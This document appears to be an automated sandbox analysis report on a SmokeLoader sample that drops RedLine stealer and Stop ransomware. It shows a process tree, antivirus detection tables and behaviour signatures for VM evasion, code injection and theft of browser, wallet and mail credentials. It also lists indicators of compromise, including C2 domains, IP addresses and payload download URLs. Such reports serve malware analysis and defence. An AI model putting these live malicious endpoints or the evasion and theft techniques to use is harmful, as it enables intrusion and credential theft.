27->92 78 C:\Users\user\AppData\Local\...\5898187.dll, PE32 27->78 dropped 146 Multi AV Scanner detection for dropped file 27->146 148 Machine Learning detection for dropped file 27->148 150 Writes to foreign memory regions 27->150 152 Allocates memory in foreign processes 27->152 36 fontview.exe 27->36         started        41 ngentask.exe 4 27->41         started        80 C:\Users\user\AppData\...\svcupdater.exe, PE32 32->80 dropped 154 Detected unpacking (changes PE section rights) 32->154 156 Detected unpacking (overwrites its own PE header) 32->156 158 Uses schtasks.exe or at.exe to add and modify task schedules 32->158 43 schtasks.exe 32->43         started        160 Injects a PE file into a foreign processes 34->160 45 2560.exe 12 34->45         started        file11 signatures12 process13 dnsIp14 82 109.206.243.168, 49734, 49735, 49736 AWMLTNL Germany 36->82 66 C:\Users\user\AppData\...\nsis_uns5aa2a3.dll, PE32+ 36->66 dropped 102 Query firmware table information (likely to detect VMs) 36->102 104 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 36->104 106 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 36->106 116 3 other signatures 36->116 47 rundll32.exe 36->47         started        84 89.208.103.88, 37538, 49733 PSKSET-ASRU Russian Federation 41->84 108 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 41->108 110 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 41->110 112 Tries to harvest and steal browser information (history, passwords, etc) 41->112 114 Tries to steal Crypto Currency Wallets 41->114 50 conhost.exe 43->50         started        86 api.2ip.ua 162.0.217.254, 443, 49730 ACPCA Canada 45->86 file15 signatures16 process17 signatures18 162 System process connects to network (likely due to code injection or exploit) 47->162 164 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 47->164 166 Tries to steal Mail credentials (via file / registry access) 47->166 168 4 other signatures 47->168 52 dllhost.exe 47->52         started        57 WerFault.exe 47->57         started        process19 dnsIp20 88 transfer.sh 144.76.136.153, 443, 49749 HETZNER-ASDE Germany 52->88 68 C:\Users\user\AppData\Local\...\Library.exe, PE32+ 52->68 dropped 118 System process connects to network (likely due to code injection or exploit) 52->118 59 Library.exe 52->59         started        file21 signatures22 process23 signatures24 128 Antivirus detection for dropped file 59->128 130 Machine Learning detection for dropped file 59->130 132 Encrypted powershell cmdline option found 59->132 62 powershell.exe 59->62         started        process25 process26 64 conhost.exe 62->64         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              aw9Ynwqd1x.exe85%ReversingLabsWin32.Trojan.SmokeLoader
              aw9Ynwqd1x.exe66%VirustotalBrowse
              aw9Ynwqd1x.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Library.exe100%AviraHEUR/AGEN.1250389
              C:\Users\user\AppData\Local\Temp\2560.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\dbjigst100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\336E.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\5898187.dll100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\Library.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\226F.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\226F.exe43%ReversingLabsWin32.Spyware.RedLine
              C:\Users\user\AppData\Local\Temp\226F.exe39%VirustotalBrowse
              C:\Users\user\AppData\Local\Temp\2560.exe67%ReversingLabsWin32.Ransomware.Stop
              C:\Users\user\AppData\Local\Temp\336E.exe81%ReversingLabsWin32.Trojan.RedLine
              C:\Users\user\AppData\Local\Temp\5898187.dll18%ReversingLabs
              C:\Users\user\AppData\Roaming\dbjigst85%ReversingLabsWin32.Trojan.SmokeLoader
              C:\Users\user\AppData\Roaming\nsis_uns5aa2a3.dll62%ReversingLabsWin64.Trojan.Generic
              SourceDetectionScannerLabelLinkDownload
              18.2.ngentask.exe.400000.0.unpack100%AviraHEUR/AGEN.1252166Download File
              16.3.226F.exe.d030000.1.unpack100%AviraHEUR/AGEN.1252166Download File
              14.2.336E.exe.400000.0.unpack100%AviraHEUR/AGEN.1213203Download File
              16.3.226F.exe.d030000.0.unpack100%AviraHEUR/AGEN.1252166Download File
              13.3.dbjigst.2c50000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              13.2.dbjigst.2c30e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              36.0.Library.exe.a20000.0.unpack100%AviraHEUR/AGEN.1250389Download File
              13.2.dbjigst.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.2.aw9Ynwqd1x.exe.2bf0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.3.aw9Ynwqd1x.exe.2c00000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              17.2.2560.exe.400000.0.unpack100%AviraHEUR/AGEN.1223627Download File
              0.2.aw9Ynwqd1x.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              16.2.226F.exe.2f20000.2.unpack100%AviraHEUR/AGEN.1228718Download File
              SourceDetectionScannerLabelLink
              potunulit.org11%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://potunulit.org/0%URL Reputationsafe
              http://potunulit.org/0%URL Reputationsafe
              http://tempuri.org/Entity/Id19Responseon100%URL Reputationphishing
              http://tempuri.org/Entity/Id19Responseon100%URL Reputationphishing
              http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
              http://tempuri.org/0%URL Reputationsafe
              http://tempuri.org/0%URL Reputationsafe
              http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
              http://ns.adobe.c/g0%URL Reputationsafe
              http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id90%URL Reputationsafe
              http://tempuri.org/Entity/Id80%URL Reputationsafe
              http://tempuri.org/Entity/Id50%URL Reputationsafe
              http://tempuri.org/Entity/Id70%URL Reputationsafe
              http://tempuri.org/Entity/Id60%URL Reputationsafe
              http://tempuri.org/Entity/Id19Response0%URL Reputationsafe
              http://novanosa5org.org/0%URL Reputationsafe
              http://golilopaster.org/0%URL Reputationsafe
              http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id15Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id14V0%URL Reputationsafe
              http://tempuri.org/Entity/Id6Response0%URL Reputationsafe
              http://bulimu55t.net/0%URL Reputationsafe
              https://api.ip.sb/ip0%URL Reputationsafe
              http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id9Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id200%URL Reputationsafe
              http://tempuri.org/Entity/Id200%URL Reputationsafe
              http://tempuri.org/Entity/Id210%URL Reputationsafe
              http://tempuri.org/Entity/Id220%URL Reputationsafe
              http://tempuri.org/Entity/Id1Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id100%URL Reputationsafe
              http://tempuri.org/Entity/Id110%URL Reputationsafe
              http://tempuri.org/Entity/Id110%URL Reputationsafe
              http://tempuri.org/Entity/Id120%URL Reputationsafe
              http://tempuri.org/Entity/Id120%URL Reputationsafe
              http://tempuri.org/Entity/Id16Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id130%URL Reputationsafe
              http://tempuri.org/Entity/Id140%URL Reputationsafe
              http://tempuri.org/Entity/Id150%URL Reputationsafe
              http://tempuri.org/Entity/Id160%URL Reputationsafe
              http://tempuri.org/Entity/Id160%URL Reputationsafe
              http://tempuri.org/Entity/Id170%URL Reputationsafe
              http://tempuri.org/Entity/Id180%URL Reputationsafe
              http://tempuri.org/Entity/Id5Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id190%URL Reputationsafe
              http://tempuri.org/Entity/Id10Response0%URL Reputationsafe
              http://tempuri.org/Entity/Id8Response0%URL Reputationsafe
              http://soryytlic4.net/0%URL Reputationsafe
              http://soryytlic4.net/0%URL Reputationsafe
              http://drampik.com/lancer/get.php11%VirustotalBrowse
              89.208.103.88:375386%VirustotalBrowse
              http://109.206.243.168/upload/libcurl.dll3%VirustotalBrowse
              http://109.206.243.168/upload/libcurl.dll0%Avira URL Cloudsafe
              http://drampik.com/lancer/get.php100%Avira URL Cloudmalware
              89.208.103.88:375380%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              potunulit.org
              188.114.97.3
              truetrueunknown
              api.2ip.ua
              162.0.217.254
              truefalse
                high
                transfer.sh
                144.76.136.153
                truefalse
                  high
                  gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    http://potunulit.org/true
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://novanosa5org.org/true
                    • URL Reputation: safe
                    unknown
                    http://golilopaster.org/true
                    • URL Reputation: safe
                    unknown
                    http://bulimu55t.net/true
                    • URL Reputation: safe
                    unknown
                    http://drampik.com/lancer/get.phptrue
                    • 11%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    unknown
                    89.208.103.88:37538true
                    • 6%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://109.206.243.168/upload/libcurl.dlltrue
                    • 3%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    unknown
                    http://soryytlic4.net/true
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Textngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://schemas.xmlsoap.org/ws/2005/02/sc/sctngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/faultPngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/chrome_newtabngentask.exe, 00000012.00000002.460489461.0000000003671000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.0000000004681000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://schemas.xmlsoap.org/ws/2004/04/security/sc/dkngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://duckduckgo.com/ac/?q=ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinaryngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://tempuri.org/Entity/Id19Responseonngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: phishing
                                  • URL Reputation: phishing
                                  unknown
                                  http://tempuri.org/Entity/Id12Responsengentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://tempuri.org/ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://tempuri.org/Entity/Id2Responsengentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://ns.adobe.c/gngentask.exe, 00000012.00000003.456193929.000000000196C000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.459451684.000000000196E000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000012.00000003.456098286.000000000196B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://tempuri.org/Entity/Id21Responsengentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrapngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://tempuri.org/Entity/Id9ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLIDngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://tempuri.org/Entity/Id8ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://tempuri.org/Entity/Id5ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Preparengentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://tempuri.org/Entity/Id7ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://tempuri.org/Entity/Id6ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecretngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tempuri.org/Entity/Id19Responsengentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            unknown
                                            http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#licensengentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuengentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2004/10/wsat/Abortedngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequencengentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/faultngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://schemas.xmlsoap.org/ws/2004/10/wsatngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeyngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://tempuri.org/Entity/Id15Responsengentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://tempuri.org/Entity/Id14Vngentask.exe, 00000012.00000002.466719826.00000000046A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namengentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renewngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://schemas.xmlsoap.org/ws/2004/10/wscoor/Registerngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://tempuri.org/Entity/Id6Responsengentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKeyngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://api.ip.sb/ip226F.exe, 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, 226F.exe, 00000010.00000003.469890360.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, 226F.exe, 00000010.00000002.479891077.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, 226F.exe, 00000010.00000003.369928370.000000000D032000.00000040.00001000.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.456297712.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/ws/2004/04/scngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PCngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancelngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://tempuri.org/Entity/Id9Responsengentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/Entity/Id20ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://api.2ip.ua/N2560.exe, 00000011.00000003.362777696.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.364169041.00000000007E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://tempuri.org/Entity/Id21ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://tempuri.org/Entity/Id22ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issuengentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://tempuri.org/Entity/Id1Responsengentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=ngentask.exe, 00000012.00000002.460489461.0000000003671000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.0000000004681000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequestedngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnlyngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wsat/Replayngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnegongentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binaryngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PCngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKeyngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/08/addressingngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuengentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2004/10/wsat/Completionngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/trustngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://tempuri.org/Entity/Id10ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id11ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000367E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id12ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://tempuri.org/Entity/Id16Responsengentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponsengentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancelngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://tempuri.org/Entity/Id13ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id14ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id15ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://tempuri.org/Entity/Id16ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/trust/Noncengentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://tempuri.org/Entity/Id17ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://tempuri.org/Entity/Id18ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://tempuri.org/Entity/Id5Responsengentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://tempuri.org/Entity/Id19ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://tempuri.org/Entity/Id10Responsengentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/Renewngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    http://tempuri.org/Entity/Id8Responsengentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • URL Reputation: safe
                                                                                                                    unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
